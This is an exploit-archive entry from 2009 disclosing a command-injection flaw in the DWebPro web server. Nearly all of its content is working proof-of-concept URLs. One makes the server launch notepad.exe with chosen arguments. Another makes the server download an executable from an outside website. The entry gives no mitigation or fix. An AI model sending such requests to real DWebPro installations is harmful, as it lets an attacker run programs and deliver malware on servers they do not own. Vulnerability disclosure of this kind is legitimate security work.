id: 9923
date: 10/17/2009
title: DWebPro command injection
author: Rafael Sousa
cves: 

=========================
DWebPro command injection
=========================


The last version of DWebPro allows an invader to execute any program. Just hit this at your browser:
 
http://127.0.0.1:8080/dwebpro/start?file=C:\windows\system32\notepad.exe&params=C:\hi.txt
 
And the notepad.exe will open a txt file that calls hi at C:\ server's side.
 
If you try this: http://127.0.0.1:8080/dwebpro/start?file=http://www.somesite.com.br/somefile.exe will open a browser at server side and download the file.
 
It's really dangerous.
 
I tested this at last version but may work at older versions as well.


#  0day.today [2023-03-23]  #